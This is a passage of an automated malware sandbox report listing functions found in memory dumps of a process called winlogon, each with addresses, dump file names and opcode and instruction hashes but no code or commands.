Function 00007FF848F2085D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c818e8a24a74271f298818d6e80805422978de905abfcfcb66521d998b5db77e
Instruction ID: 1a3fdb797ba2e8a222ebc13656544fe3ff37d6c20c6760d9eccf7dcd220021ba
Opcode Fuzzy Hash: c818e8a24a74271f298818d6e80805422978de905abfcfcb66521d998b5db77e
Instruction Fuzzy Hash: F5012232D0D68E9EE742FB78A8885FA7BE0FF85340F2504B2D848C60D2EF21A4458395

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F325EB Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 440b39ba3917acc1b478a6e93092b38593c48d10633a3d1e2726a5fa3aa8e53e
Instruction ID: b5167317cbd3c596ad4c9884b6794e3395c4c52cef769ea3856f4f86ceba1833
Opcode Fuzzy Hash: 440b39ba3917acc1b478a6e93092b38593c48d10633a3d1e2726a5fa3aa8e53e
Instruction Fuzzy Hash: 5511DD3084D7894FDB5AAB6088292E97BA0FF16302F4504BBD40AC60E2EB396645C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F34B15 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfe119924d1861ad8d1b8363c2bcc46477cde4881d118facbea97fd31cd60b0d
Instruction ID: b6a47abf2806dd8bba4f3aadbf67dea9e14cbd8a392ef81b582ef716d989a74a
Opcode Fuzzy Hash: bfe119924d1861ad8d1b8363c2bcc46477cde4881d118facbea97fd31cd60b0d
Instruction Fuzzy Hash: F211C131C0DA899FEB99EBA4886A2B87BA0FF79341F0500FFC00DC65E2DB296444C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2BE4D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2a000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction ID: 1f3e8d9c52c75fc53ba3d6008798767c9ee0576841aeda0c8bd056c1cfc2c0d1
Opcode Fuzzy Hash: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction Fuzzy Hash: 4521C470D1960ACFDB58EF94E4906FDBBB1AF18350F10403AE819A32D1CB396980CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2359B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47460e923325a5f8fa34e3979aeb36b4bfeb578e628af57e71976189a53fc679
Instruction ID: aa395119846a4536b95d140c5e225c74cd8beb9a0628496dcfd052869c37e8a9
Opcode Fuzzy Hash: 47460e923325a5f8fa34e3979aeb36b4bfeb578e628af57e71976189a53fc679
Instruction Fuzzy Hash: 1C1182B090D58B4EEB59AB2CE5166B977A0FF19345F0408BDC00ED24E2DF3A64018715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F37441 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f37000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31944a5d0c35b937a14e625208ce50254c227daffce26fdadf6ea4015d7d1c1e
Instruction ID: 64a3c8aa119ef2cb98fb2b32f590112a993500bd33f7d87f753436e380c3c21d
Opcode Fuzzy Hash: 31944a5d0c35b937a14e625208ce50254c227daffce26fdadf6ea4015d7d1c1e
Instruction Fuzzy Hash: 6E112A3090C94EDFE751FBB8C8486A9BBE4FF19351F0404B6D409C7091EB38A5908755

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F34F29 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c085a068d03b4415690f322c0c9aff79cfc359270a66b04dc7a114ae54bcf8
Instruction ID: 548c797db802a46011dec72c7e687445969fe153f2c8842d4577c0a03992b664
Opcode Fuzzy Hash: 00c085a068d03b4415690f322c0c9aff79cfc359270a66b04dc7a114ae54bcf8
Instruction Fuzzy Hash: C8118B3080D68A8FEB85EB6488692BD7BE0FF29341F0805BBD409C75D2EB296444C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F327D1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c47e6108e53f62df8117108f9145f98280a75284e3e8bd132f8a916899ebd8d
Instruction ID: 6860b184ad8dfbd90e3c8c0e4ea123ff218500c30511ea9e19c4a0b6036eab15
Opcode Fuzzy Hash: 8c47e6108e53f62df8117108f9145f98280a75284e3e8bd132f8a916899ebd8d
Instruction Fuzzy Hash: FC116D3090D69A9EEB82FBA8889C6F97BE0FF19342F1448B7D408C7096EB34A144C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F34C3D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57188b709d2a145ced9e317f121362a6541bcf1b15efe61725acb7184025dcd6
Instruction ID: 3f00b91a1fa41709c5f32cbfb67f955a50f8ba7400701a22c9524352c2fa0c01
Opcode Fuzzy Hash: 57188b709d2a145ced9e317f121362a6541bcf1b15efe61725acb7184025dcd6
Instruction Fuzzy Hash: D811BF3080D68A9FEB89EBA484596BEBBE0FF29340F0404BBC409C71D2DB35A440C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F234F5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bf360dd601310a48aeb8d3a218272608d0603ff9b1e97e98df321ee45ed24b9
Instruction ID: ff7e0bb881d9c4ba911f3323ba9947e4facd63970502d3626453f69cb223f050
Opcode Fuzzy Hash: 3bf360dd601310a48aeb8d3a218272608d0603ff9b1e97e98df321ee45ed24b9
Instruction Fuzzy Hash: 7C113CB091868E8FDB59EF68945A6B97BA0FF18301F4404BAD41DD61A1DB36A5408705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F34E9D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 819168ff65f1430fbe698b3aa5a552f4c5221558b677756bfec09630286a93f3
Instruction ID: 66749767b6e405ba977760333979d8d7fe4157a9eeae94679b3b83648083aa5b
Opcode Fuzzy Hash: 819168ff65f1430fbe698b3aa5a552f4c5221558b677756bfec09630286a93f3
Instruction Fuzzy Hash: 3A119E3090D68A8FEB49EB6484696BD7BE0FF28341F0405BBD419C65D2DB39A580C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2BCE5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2a000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9047fd97c6ffa3401fa95a89a8493bba2e7019389b992dfb194e31dc949a27fa
Instruction ID: 198d28c70e02e67dbb1a81495ae1a805d9cf5413051d681edfe424ab475e13f1
Opcode Fuzzy Hash: 9047fd97c6ffa3401fa95a89a8493bba2e7019389b992dfb194e31dc949a27fa
Instruction Fuzzy Hash: 67113930919A8E8FEB85EF6898592FDBBE0FF18341F8005BAD819C61D2DB76A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b1dc7d65568944ce768a8dceff4f20e08e22cc6d8f0a687937ac6dac2309ed7
Instruction ID: 0a61b1c68141a134a0504495b4cd64380ac9b535a97929d2a5ea3f617db3492a
Opcode Fuzzy Hash: 1b1dc7d65568944ce768a8dceff4f20e08e22cc6d8f0a687937ac6dac2309ed7
Instruction Fuzzy Hash: 75018B30D0DA8E8FE751FB6898996A9BBE0FF59341F0508B6D40CCB1E2EB39E4448705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F205D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455fa3aaf9da20c73db0b933dcbf945882d14e5c393eb5c86f393afb75e6b2a5
Instruction ID: 247e03311bf61ea5b4fb3ce988cdabb1528765a4c2be3cb1980552521a32e897
Opcode Fuzzy Hash: 455fa3aaf9da20c73db0b933dcbf945882d14e5c393eb5c86f393afb75e6b2a5
Instruction Fuzzy Hash: B5018C3494850E8FEB48EF64D0596FA77A1FF58345F10047AD40EC21D0CB32B5A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32275 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec56fec34d392f3272e8878d5264dfe467c7dbb3ad6b59b4751c543f02522dec
Instruction ID: b7f34ef8120deab3d117214f00a0ae8d546c3a7add44ec7a110a3cc4de7e40ba
Opcode Fuzzy Hash: ec56fec34d392f3272e8878d5264dfe467c7dbb3ad6b59b4751c543f02522dec
Instruction Fuzzy Hash: EA01DF3084D6898FEB49EF74C8586BA7BA0FF1A301F0108BBE41AD60D2DF35A554CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F37D31 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f37000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19de638a459cc45b29c5b93e7eb598ad7f906de4bb660e74ff074ebd57a4ce5
Instruction ID: 7bdc76e9de17995777ce4cc0f3b650b64fe1a95847fbd66afd7f4d2038589625
Opcode Fuzzy Hash: f19de638a459cc45b29c5b93e7eb598ad7f906de4bb660e74ff074ebd57a4ce5
Instruction Fuzzy Hash: A8015A3085DA899FDB49EF24C8A96BD7BA0EF19340F0404BFD40AC65D2EF65A550C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d0e9e11ebf52b69c4e2dc8500c82664d710be9d98e628f30da0b6ac6c7b9db
Instruction ID: f95f4bd1f54e7b088a9979714df20b9cbee4c8a36bd6c778331829fcdcb86ff8
Opcode Fuzzy Hash: b5d0e9e11ebf52b69c4e2dc8500c82664d710be9d98e628f30da0b6ac6c7b9db
Instruction Fuzzy Hash: 3601B83080D64E8FE785BBA898882E9BBE0FF19341F1108B7D408C60A2EB39E0408701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F37DAD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f37000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e02930b358af984d26d79f0d4191383803fafb825d2413173ef1baecf793d44
Instruction ID: d5228d589711141664115b5291de07d59e190a4a400c778653f02597ebe3f954
Opcode Fuzzy Hash: 9e02930b358af984d26d79f0d4191383803fafb825d2413173ef1baecf793d44
Instruction Fuzzy Hash: A0019A3090DA8A8FDB4AEB3484692BA7BA0FF19340F4004BFD40AC65D2DF25A440C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2AB15 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2a000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94665862199079d42390e4480d6bb3c08b196c6f9bafa38c30f06424bf2df720
Instruction ID: ca9d9b93b1a27af1b6db928b88b782ad5091f3c0c194047dd113d100a6d1c4b8
Opcode Fuzzy Hash: 94665862199079d42390e4480d6bb3c08b196c6f9bafa38c30f06424bf2df720
Instruction Fuzzy Hash: 59F0C83660E3964FC312A72DBCA11EA7B74DF92265B4943F7C084CA1D3DA1E944E8794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41bba34809ac99432ae78c5331a4c3be8e16732d389db9b15e4cd76e74902586
Instruction ID: f958b565d0da5d5c0b0f17f688774db20d571ce9d9c0daf720e96739ed88f03b
Opcode Fuzzy Hash: 41bba34809ac99432ae78c5331a4c3be8e16732d389db9b15e4cd76e74902586
Instruction Fuzzy Hash: 4C017C31D1D6898FE742BB7498592A9BBE0FF5A340F4608B7D408CB0E6EB39A5448711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2AAA9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2a000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f974e3ee5f4a3662da48ff5cb3545dff41ba5de59d9790ade2ae4f87f8fcb960
Instruction ID: bc12834d324fb5caf6a547142d311a4bf34ca6263c6727947403196f86db886b
Opcode Fuzzy Hash: f974e3ee5f4a3662da48ff5cb3545dff41ba5de59d9790ade2ae4f87f8fcb960
Instruction Fuzzy Hash: 5C018F3094D6898FE752BB74995D5A97BE0EF19380F0509F3D008C70A2EB39A484CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F375C9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f37000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904ae8e493298c1b095c25a968726d2c6e71246f8ead5afa63e0e147fa9d9e3e
Instruction ID: 722116f4f57e086b4b3afdf8527d1de87a6ed579ac82660863c83ba0523c3fcf
Opcode Fuzzy Hash: 904ae8e493298c1b095c25a968726d2c6e71246f8ead5afa63e0e147fa9d9e3e
Instruction Fuzzy Hash: 74014F7094EA8A9FE792FB38886D5A97BE0EF59350F0549F7D408C70E2EF38A5448711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d8b670d5775d88355a69af7471e960be5c2599bd5d128764f9b99d40341a50
Instruction ID: c68dcafeed1bf77198199b695eef4bb4b2f69cb0069323932624f6194ab897a4
Opcode Fuzzy Hash: 68d8b670d5775d88355a69af7471e960be5c2599bd5d128764f9b99d40341a50
Instruction Fuzzy Hash: A301693091C60E9EEB59FBA494586BEB6A1FF18345F50087EE40EC61D1DF36A590C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec56856dcdaa8670ab28c5361cb777a48188571e4052506bf75f12bc80acad90
Instruction ID: e7a93d8a6f69ef5446d71d040b095d93e909067e5499fff0350c7fe3b08afaf0
Opcode Fuzzy Hash: ec56856dcdaa8670ab28c5361cb777a48188571e4052506bf75f12bc80acad90
Instruction Fuzzy Hash: F2016930918A0E9FEB59EB6494592F9B7E0FF18345F20087EE80EC21D1DF3AA550C614

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F21BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b7d541edbaaef6b8b5ee9d00e6b38dae502c0d890f2e305098be488442acb7b
Instruction ID: df80ffa4333f6f88a0de7da8f6ca81e9f8f13f47747efa15f7ef5f3b5d14e545
Opcode Fuzzy Hash: 6b7d541edbaaef6b8b5ee9d00e6b38dae502c0d890f2e305098be488442acb7b
Instruction Fuzzy Hash: 8F01D13080D68D8FEB99EF6494592F93BA0FF55301F4401BEE808C71D2DB36A490C789

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2BE37 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2a000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction ID: b87b2a11311206fda19048252d97a9318818e10736f266eeba4447d01dde4491
Opcode Fuzzy Hash: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction Fuzzy Hash: 4001C870D1960ACFDB18EF84D4906FDB7B1EF48360F24412ED506A32D0CB396951CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F205D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecdfec3982a9184e033be1d1f497bfd813969fbc981dae94ce96ccbfbb5e5b7e
Instruction ID: a9cc33d3bde4bb20d952d65632bcacafedbc2e4d036f88b725cfa0099390ea15
Opcode Fuzzy Hash: ecdfec3982a9184e033be1d1f497bfd813969fbc981dae94ce96ccbfbb5e5b7e
Instruction Fuzzy Hash: 6CF0AF3084E64E8FEB48AF64A4052FA77A4EF15349F10053AE80DC21C1DB36A4A0CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bedb8203670231f98933a5253f497aae2fa801abc983754e7aade16bdfe8252
Instruction ID: 1d4ac97ad696546681009e5757349fbadeaeb5741b8abb8c6a732eb59e240a54
Opcode Fuzzy Hash: 5bedb8203670231f98933a5253f497aae2fa801abc983754e7aade16bdfe8252
Instruction Fuzzy Hash: 69F0F63180E38A8FEB5AAF7498682B97F61FF16301F4508FAD409C61D2DB39A404C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F37AB3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f37000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b692eee14dc72fca5401fbe283dd41b25b44af3f82d09d7ce00bd09e6e3e4ea
Instruction ID: f98707c010d106eaeaadfcc41ed3149bf598ddb8dc93be12b89e60c6b9d29279
Opcode Fuzzy Hash: 0b692eee14dc72fca5401fbe283dd41b25b44af3f82d09d7ce00bd09e6e3e4ea
Instruction Fuzzy Hash: 73F03A31E1C51D8BDF18EB98E8914FDB7B5FF98240F50013AD009A7282CF286A058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F227CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa3bb70f5e4b052e4a21583add464e80a4d7a6fbc3d38833a9a635a779067b9
Instruction ID: 980ce00d37e422c42ba4f6b4c9a53e8f49251914fea29bec0d7926aacf0363ae
Opcode Fuzzy Hash: 8aa3bb70f5e4b052e4a21583add464e80a4d7a6fbc3d38833a9a635a779067b9
Instruction Fuzzy Hash: 4AF0903080E68D8FEB59AF6498191F9BBA0FF15341F4409BAD809C60D2DB3AD554C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F21710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 63c3783ce78bb149f41a8a6bce26df3978d0eb3fb6fb664055e62e820f5b98b2
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: 5EE06D30E0D9124EEA64B398A08467861D19F44384FB88274F03CCA1E1EB2EFCC2C20C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2BEDE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2a000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction ID: 916d8147350be11d6e4bf04759eed13a4680c671eed6913600e3d59c459fde1e
Opcode Fuzzy Hash: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction Fuzzy Hash: 14D04235A1892D8EDF40EB98E8445EDB3B5FB58351F000526D51DD7295DB6168108B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F251AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: 0922b8fcb3fb5b7a72493e894b85ba2a29af6d63b12639ae94509f0a99eb8be4
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: 84E02670D19E1D8EEBF4EB089C50BB9B6B1BB58642F5000EAC00DE2280DE352A809F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2B32B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f2a000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3a484074a9262192f6ae91af9ad8b0b8747c8289cfea10e6e5b01946689f155
Instruction ID: fcb70305bffc8a09c788141b3399a948138d04e19928b26f0cadaa5b80dcc8c9
Opcode Fuzzy Hash: f3a484074a9262192f6ae91af9ad8b0b8747c8289cfea10e6e5b01946689f155
Instruction Fuzzy Hash: DED05E30C1D54A9EDB91F710C851AE9B770EF19340F1442E2800DC2182CF38AAC48F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf1d09a54c5f66c9f7a83537e81e6fe95299c91ada44a83c90181223d58f4f7f
